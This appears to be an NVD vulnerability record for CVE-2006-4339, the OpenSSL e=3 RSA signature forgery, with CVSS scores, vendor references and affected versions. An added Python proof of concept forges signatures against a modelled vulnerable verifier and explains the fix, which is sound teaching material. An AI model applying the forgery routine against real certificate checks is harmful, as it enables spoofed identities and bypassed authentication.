Vulnerability Summary for CVE-2006-4339

Original release date: 09/05/2006
Last revised: 08/30/2013
Source: US-CERT/NIST

Overview

OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when verifying a PKCS #1 v1.5 signature made with an RSA key whose public exponent is 3, strips the padding from the recovered block and parses the DigestInfo that follows without checking that it fills the rest of the block, so any bytes after the hash are ignored. Because verification computes s^3 mod n, a remote attacker can take the integer cube root of a block whose high bytes are valid padding plus the DigestInfo of a chosen message and whose low bytes are arbitrary; s^3 then stays below n, no modular reduction occurs, and the result is accepted as a signature under that key. This allows remote attackers to forge PKCS #1 v1.5 signatures without the private key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1.
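The forgery described above, worked through as an added Python example. This is not code from the NVD record or from OpenSSL; the modulus N is a constructed 2048-bit stand-in (the attack depends only on n's size, because the attacker arranges s^3 < n, never on its factors), the hash is SHA-1 with its standard DigestInfo prefix, and the message is a constructed string. verify_vulnerable models the pre-0.9.7k/0.9.8c logic (strip 00 01 FF..FF 00, parse the DigestInfo, ignore what is left); verify_fixed rebuilds the whole expected block as RFC 8017 section 8.2.2 does, which closes the hole in the same way as the upstream fix's check that no bytes remain after the DigestInfo.

```python
"""Bleichenbacher's e=3 PKCS #1 v1.5 forgery (CVE-2006-4339), modelled in pure Python.

Added example, not OpenSSL code. N is a constructed stand-in modulus: the
forgery only needs s**3 to stay below n, so its factorization is irrelevant
and no private key is used anywhere below.
"""
import hashlib
import hmac
import random

E = 3                   # small public exponent; the attack needs e=3
KEY_BITS = 2048
K = KEY_BITS // 8       # modulus length in bytes

# Constructed 2048-bit odd integer with the top bit set, standing in for n.
N = random.Random(4339).getrandbits(KEY_BITS) | (1 << (KEY_BITS - 1)) | 1

# DER prefix of DigestInfo for SHA-1 (RFC 8017, section 9.2, note 1).
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")


def os2ip(b: bytes) -> int:
    return int.from_bytes(b, "big")


def i2osp(x: int, length: int) -> bytes:
    return x.to_bytes(length, "big")


def digest_info(msg: bytes) -> bytes:
    """DER DigestInfo: fixed prefix followed by the 20-byte SHA-1 digest."""
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def rsa_public_op(sig: bytes) -> bytes:
    """EM = s**e mod n, exactly as a verifier recovers the encoded block."""
    return i2osp(pow(os2ip(sig), E, N), K)


def verify_vulnerable(msg: bytes, sig: bytes) -> bool:
    """Pre-fix behaviour: strip 00 01 FF..FF 00 (at least 8 FF bytes), parse
    the DigestInfo that follows and never check that it consumed the whole
    block. DER is self-delimiting, so 'parse and ignore the rest' is a prefix
    comparison against the expected DigestInfo."""
    em = rsa_public_op(sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return False
    body = em[i + 1:]
    expected = digest_info(msg)
    return body[:len(expected)] == expected   # BUG: trailing bytes are ignored


def verify_fixed(msg: bytes, sig: bytes) -> bool:
    """RFC 8017 section 8.2.2: rebuild the whole expected EM and compare it to
    the recovered block, so every byte of the block is constrained."""
    em = rsa_public_op(sig)
    t = digest_info(msg)
    ps_len = K - len(t) - 3
    if ps_len < 8:
        return False
    expected_em = b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t
    return hmac.compare_digest(em, expected_em)


def ceil_cbrt(x: int) -> int:
    """Smallest integer s with s**3 >= x (binary search, exact on big ints)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg: bytes) -> bytes:
    """Forge a signature for msg with no private key.

    Put minimal valid padding plus the DigestInfo in the high bytes of a
    K-byte block, leave the low 210 bytes (1680 bits) as zero garbage, and
    take the ceiling cube root. Cubing the root reproduces the high bytes
    because the rounding error is below (s+1)**3 - s**3, roughly 2**1358
    here, which cannot carry out of the garbage region, and s**3 < 2**2034 < n
    so the modular reduction never takes effect."""
    t = digest_info(msg)
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    target = os2ip(head + b"\x00" * (K - len(head)))
    s = ceil_cbrt(target)
    cube = s ** 3
    if cube >= N:
        raise ValueError("cube wraps modulo n; key too small for this hash")
    if i2osp(cube, K)[:len(head)] != head:
        raise ValueError("garbage region too small to absorb rounding")
    return i2osp(s, K)


if __name__ == "__main__":
    message = b"constructed message: CN=attacker, CA=TRUE"   # constructed input
    sig = forge(message)
    print("vulnerable verifier accepts forgery:", verify_vulnerable(message, sig))
    print("fixed verifier accepts forgery:     ", verify_fixed(message, sig))
```

Two things the example makes concrete. The attack needs the unchecked region to be much larger than the cube-root rounding error, which is why a 2048-bit key with e=3 is a comfortable target while e=65537 is not reachable this way at all; and the robust fix is not a better parser but no parser: build the full expected encoding and compare the entire block in constant time.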

Impact

CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information

Vendor Statements

Official Statement from Red Hat (03/14/2007)
Vulnerable. This issue affects OpenSSL and OpenSSL compatibility packages in Red Hat Enterprise Linux 2.1, 3, and 4. Updates, along with our advisory are available at the URL below. http://rhn.redhat.com/errata/RHSA-2006-0661.html Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.

References to Advisories, Solutions, and Tools


External Source: FREEBSD
Name: FreeBSD-SA-06:19
External Source: VUPEN
Name: ADV-2007-2783
External Source: SECUNIA
Name: 22446
External Source: HP
Name: SSRT061181
External Source: SECTRACK
Name: 1017522
External Source: SECUNIA
Name: 23680
External Source: SECUNIA
Name: 21812
Type: Advisory
External Source: SECUNIA
Name: 22758
External Source: BID
Name: 28276
External Source: SUNALERT
Name: 102648
External Source: SECUNIA
Name: 22948
External Source: SECUNIA
Name: 21927
Type: Advisory
External Source: VUPEN
Name: ADV-2006-4205
External Source: VUPEN
Name: ADV-2006-5146
External Source: CONFIRM
Name: http://www.vmware.com/support/player2/doc/releasenotes_player2.html
External Source: SGI
Name: 20060901-01-P
External Source: SECUNIA
Name: 22036
Type: Advisory
External Source: CONFIRM
Name: http://openvpn.net/changelog.html
External Source: SUSE
Name: SUSE-SA:2007:010
External Source: GENTOO
Name: GLSA-200609-18
External Source: MLIST
Name: [ietf-openpgp] 20060827 Bleichenbacher's RSA signature forgery based on implementation error
External Source: REDHAT
Name: RHSA-2007:0062
External Source: SECUNIA
Name: 21852
Type: Advisory
External Source: SECUNIA
Name: 25284
External Source: SECUNIA
Name: 31492
External Source: CONFIRM
Name: http://www.opera.com/support/search/supsearch.dml?index=845
External Source: CONFIRM
Name: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117
External Source: SECUNIA
Name: 28115
External Source: SECUNIA
Name: 22325
External Source: SECUNIA
Name: 22934
External Source: SECUNIA
Name: 22044
External Source: SECUNIA
Name: 22284
External Source: OSVDB
Name: 28549
External Source: HP
Name: SSRT061275
External Source: MANDRIVA
Name: MDKSA-2006:161
External Source: HP
Name: HPSBTU02207
External Source: OPENPKG
Name: OpenPKG-SA-2006.018
External Source: CONFIRM
Name: http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html
External Source: MANDRIVA
Name: MDKSA-2006:207
External Source: SECUNIA
Name: 23794
External Source: HP
Name: HPSBUX02165
External Source: BUGTRAQ
Name: 20070110 VMware ESX server security updates
External Source: SUNALERT
Name: 201534
External Source: HP
Name: HPSBUX02219
External Source: OPENPKG
Name: OpenPKG-SA-2006.029
External Source: SUNALERT
Name: 102759
External Source: CONFIRM
Name: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html
External Source: BID
Name: 22083
External Source: SUNALERT
Name: 102744
External Source: SECUNIA
Name: 22711
External Source: HP
Name: SSRT061239
External Source: HP
Name: HPSBOV02683
External Source: HP
Name: HPSBUX02186
External Source: SECUNIA
Name: 22161
Type: Advisory
External Source: VUPEN
Name: ADV-2007-1945
External Source: SECUNIA
Name: 23455
External Source: CONFIRM
Name: https://secure-support.novell.com/KanisaPlatform/Publishing/41/3143224_f.SAL_Public.html
External Source: DEBIAN
Name: DSA-1173
Type: Patch Information
External Source: SUNALERT
Name: 201247
External Source: SECUNIA
Name: 24950
External Source: VUPEN
Name: ADV-2006-3730
External Source: VUPEN
Name: ADV-2006-4750
External Source: SLACKWARE
Name: SSA:2006-257-02
External Source: SECUNIA
Name: 22585
External Source: GENTOO
Name: GLSA-200609-05
External Source: BUGTRAQ
Name: 20060912 ERRATA: [ GLSA 200609-05 ] OpenSSL, AMD64 x86 emulation base libraries: RSA signature forgery
External Source: HP
Name: SSRT061213
External Source: SECUNIA
Name: 22513
External Source: CONFIRM
Name: http://www.vmware.com/support/server/doc/releasenotes_server.html
External Source: SECUNIA
Name: 21906
Type: Advisory
External Source: SECUNIA
Name: 21767
Type: Advisory
External Source: CISCO
Name: 20061108 Multiple Vulnerabilities in OpenSSL Library
External Source: SECUNIA
Name: 21930
Type: Advisory
External Source: SECUNIA
Name: 22260
Type: Advisory
External Source: VUPEN
Name: ADV-2010-0366
External Source: CONFIRM
Name: https://issues.rpath.com/browse/RPL-616
External Source: VUPEN
Name: ADV-2006-4417
External Source: VUPEN
Name: ADV-2007-2163
External Source: VUPEN
Name: ADV-2006-4586
External Source: SUNALERT
Name: 102656
External Source: REDHAT
Name: RHSA-2006:0661
Type: Advisory
External Source: SECUNIA
Name: 22733
External Source: OVAL
Name: oval:org.mitre.oval:def:11656
External Source: CONFIRM
Name: http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html
External Source: CONFIRM
Name: http://www.vmware.com/security/advisories/VMSA-2008-0005.html
External Source: CONFIRM
Name: http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html
External Source: GENTOO
Name: GLSA-200610-06
External Source: VUPEN
Name: ADV-2006-4744
External Source: CONFIRM
Name: http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html
External Source: SUNALERT
Name: 102686
External Source: SECUNIA
Name: 22949
External Source: SUSE
Name: SUSE-SA:2006:055
External Source: VUPEN
Name: ADV-2006-3566
External Source: SECUNIA
Name: 21873
Type: Advisory
External Source: SECUNIA
Name: 21846
Type: Advisory
External Source: SECUNIA
Name: 22937
External Source: HP
Name: SSRT061266
External Source: SECUNIA
Name: 23915
External Source: SECUNIA
Name: 26329
External Source: HP
Name: SSRT071299
External Source: HP
Name: HPSBMA02250
External Source: SECUNIA
Name: 22799
External Source: SUSE
Name: SUSE-SR:2006:026
External Source: HP
Name: SSRT061273
External Source: MISC
Name: http://docs.info.apple.com/article.html?artnum=307177
External Source: CONFIRM
Name: http://support.attachmate.com/techdocs/2128.html
External Source: APPLE
Name: APPLE-SA-2007-12-14
External Source: SECUNIA
Name: 22226
Type: Advisory
External Source: CONFIRM
Name: http://www.vmware.com/support/player/doc/releasenotes_player.html
External Source: BUGTRAQ
Name: 20060905 rPSA-2006-0163-1 openssl openssl-scripts
External Source: SUSE
Name: SUSE-SA:2006:061
External Source: SECUNIA
Name: 21776
Type: Advisory
External Source: HP
Name: SSRT071304
External Source: VUPEN
Name: ADV-2007-0254
External Source: CONFIRM
Name: http://www.openssl.org/news/secadv_20060905.txt
Type: Advisory; Patch Information
External Source: HP
Name: SSRT090208
External Source: SECUNIA
Name: 22671
External Source: SUNALERT
Name: 200708
External Source: SLACKWARE
Name: SSA:2006-310-01
External Source: SECUNIA
Name: 24930
External Source: VUPEN
Name: ADV-2007-1815
External Source: CISCO
Name: 20061108 Multiple Vulnerabilities in OpenSSL library
External Source: CONFIRM
Name: http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html
External Source: SECUNIA
Name: 21778
Type: Advisory
External Source: VUPEN
Name: ADV-2007-0343
External Source: VUPEN
Name: ADV-2006-3899
External Source: CONFIRM
Name: http://support.attachmate.com/techdocs/2127.html
External Source: UBUNTU
Name: USN-339-1
Type: Patch Information
External Source: APPLE
Name: APPLE-SA-2006-11-28
External Source: MLIST
Name: [security-announce] 20080317 VMSA-2008-0005 Updated VMware Workstation, VMware Player, VMware Server, VMware ACE, and VMware Fusion resolve critical security issues
External Source: BEA
Name: BEA07-169.00
External Source: VUPEN
Name: ADV-2006-4366
External Source: BID
Name: 19849
Type: Patch Information
External Source: CONFIRM
Name: http://support.avaya.com/elmodocs2/security/ASA-2006-188.htm
External Source: VUPEN
Name: ADV-2006-4216
External Source: VUPEN
Name: ADV-2006-3748
External Source: SECUNIA
Name: 22545
External Source: HP
Name: HPSBUX02153
External Source: JVNDB
Name: JVNDB-2012-000079
External Source: CONFIRM
Name: http://www.bluecoat.com/support/knowledge/openSSL_RSA_Signature_forgery.html
External Source: VUPEN
Name: ADV-2006-4207
External Source: VUPEN
Name: ADV-2008-0905
External Source: VUPEN
Name: ADV-2007-4224
External Source: SECUNIA
Name: 22259
Type: Advisory
External Source: VUPEN
Name: ADV-2006-4329
External Source: VUPEN
Name: ADV-2006-3453
External Source: SECUNIA
Name: 25649
External Source: MANDRIVA
Name: MDKSA-2006:178
External Source: SECTRACK
Name: 1016791
External Source: SECUNIA
Name: 21709
Type: Advisory; Patch Information
External Source: SECUNIA
Name: 21791
Type: Advisory
External Source: SECUNIA
Name: 25399
External Source: VUPEN
Name: ADV-2006-3936
External Source: JVN
Name: JVN#51615542
External Source: SECUNIA
Name: 22938
External Source: SECUNIA
Name: 22523
External Source: SECUNIA
Name: 22936
External Source: SECUNIA
Name: 22689
External Source: SECUNIA
Name: 38567
External Source: VUPEN
Name: ADV-2007-2315
External Source: SUNALERT
Name: 1000148
External Source: MANDRIVA
Name: MDKSA-2006:177
External Source: VUPEN
Name: ADV-2006-4206
External Source: CONFIRM
Name: http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html
External Source: XF
Name: openssl-rsa-security-bypass(28755)
External Source: SECUNIA
Name: 24099
External Source: REDHAT
Name: RHSA-2007:0073
External Source: CONFIRM
Name: http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html
US-CERT Vulnerability Note: CERT-VN
Name: VU#845620
External Source: BUGTRAQ
Name: 20080318 VMSA-2008-0005 Updated VMware Workstation, VMware Player, VMware Server, VMware ACE, and VMware Fusion resolve critical security issues
External Source: SECUNIA
Name: 22232
Type: Advisory
External Source: CONFIRM
Name: http://www.serv-u.com/releasenotes/
External Source: MISC
Name: http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/
External Source: VUPEN
Name: ADV-2007-1401
External Source: SECUNIA
Name: 22940
US-CERT Vulnerability Note: CERT
Name: TA06-333A
External Source: SECUNIA
Name: 22509
External Source: CONFIRM
Name: http://www.openoffice.org/security/cves/CVE-2006-4339.html
External Source: SECUNIA
Name: 22932
External Source: MLIST
Name: [bind-announce] 20061103 Internet Systems Consortium Security Advisory. [revised]
External Source: CONFIRM
Name: http://www.sybase.com/detail?id=1047991
External Source: SECUNIA
Name: 23841
External Source: VUPEN
Name: ADV-2006-3793
External Source: OPENBSD
Name: [3.9] 20060908 011: SECURITY FIX: September 8, 2006
External Source: SECUNIA
Name: 23155
External Source: SECUNIA
Name: 21823
Type: Advisory
External Source: CONFIRM
Name: http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html
External Source: SECUNIA
Name: 22939
External Source: SECUNIA
Name: 21785
Type: Advisory
External Source: SECUNIA
Name: 38568
External Source: CONFIRM
Name: http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html
External Source: SECUNIA
Name: 26893
External Source: SECUNIA
Name: 22066
External Source: REDHAT
Name: RHSA-2008:0629
External Source: CONFIRM
Name: http://docs.info.apple.com/article.html?artnum=304829
External Source: SECUNIA
Name: 21982
Type: Advisory
External Source: SUNALERT
Name: 102657
External Source: SECUNIA
Name: 21870
Type: Advisory
External Source: REDHAT
Name: RHSA-2007:0072
External Source: SUNALERT
Name: 102722
External Source: CONFIRM
Name: https://issues.rpath.com/browse/RPL-1633
External Source: DEBIAN
Name: DSA-1174
Type: Patch Information
External Source: CONFIRM
Name: http://support.attachmate.com/techdocs/2137.html
External Source: CONFIRM
Name: http://www.arkoon.fr/upload/alertes/40AK-2006-04-FR-1.1_SSL360_OPENSSL_RSA.pdf
External Source: SUNALERT
Name: 102696
External Source: VUPEN
Name: ADV-2006-4327

References to Check Content

Identifier: oval:org.mitre.oval:def:11656
Check System: http://oval.mitre.org/XMLSchema/oval-definitions-5

Vulnerable software and versions

Configuration 1
OR
* cpe:/a:openssl:openssl:0.9.7a
* cpe:/a:openssl:openssl:0.9.7b
* cpe:/a:openssl:openssl:0.9.7c
* cpe:/a:openssl:openssl:0.9.7d
* cpe:/a:openssl:openssl:0.9.7e
* cpe:/a:openssl:openssl:0.9.7f
* cpe:/a:openssl:openssl:0.9.7g
* cpe:/a:openssl:openssl:0.9.7h
* cpe:/a:openssl:openssl:0.9.7i
* cpe:/a:openssl:openssl:0.9.7j
* cpe:/a:openssl:openssl:0.9.8
* cpe:/a:openssl:openssl:0.9.8a
* cpe:/a:openssl:openssl:0.9.8b
* cpe:/a:openssl:openssl:0.9.7 and previous versions
* cpe:/a:openssl:openssl:0.9.6g
* cpe:/a:openssl:openssl:0.9.6f
* cpe:/a:openssl:openssl:0.9.6i
* cpe:/a:openssl:openssl:0.9.6h
* cpe:/a:openssl:openssl:0.9.6c
* cpe:/a:openssl:openssl:0.9.6e
* cpe:/a:openssl:openssl:0.9.6d
* cpe:/a:openssl:openssl:0.9.6k
* cpe:/a:openssl:openssl:0.9.6j
* cpe:/a:openssl:openssl:0.9.6l
* cpe:/a:openssl:openssl:0.9.5a:beta2
* cpe:/a:openssl:openssl:0.9.6b
* cpe:/a:openssl:openssl:0.9.6a
* cpe:/a:openssl:openssl:0.9.6a:beta1
* cpe:/a:openssl:openssl:0.9.6a:beta2
* cpe:/a:openssl:openssl:0.9.6a:beta3
* cpe:/a:openssl:openssl:0.9.6
* cpe:/a:openssl:openssl:0.9.6:beta1
* cpe:/a:openssl:openssl:0.9.6:beta2
* cpe:/a:openssl:openssl:0.9.6:beta3
* cpe:/a:openssl:openssl:0.9.5:beta2
* cpe:/a:openssl:openssl:0.9.5a
* cpe:/a:openssl:openssl:0.9.5a:beta1
* cpe:/a:openssl:openssl:0.9.3a
* cpe:/a:openssl:openssl:0.9.4
* cpe:/a:openssl:openssl:0.9.5
* cpe:/a:openssl:openssl:0.9.5:beta1
* cpe:/a:openssl:openssl:0.9.3
* cpe:/a:openssl:openssl:0.9.2b
* cpe:/a:openssl:openssl:0.9.1c
* cpe:/a:openssl:openssl:0.9.6m
* Denotes Vulnerable Software

Technical Details

Vulnerability Type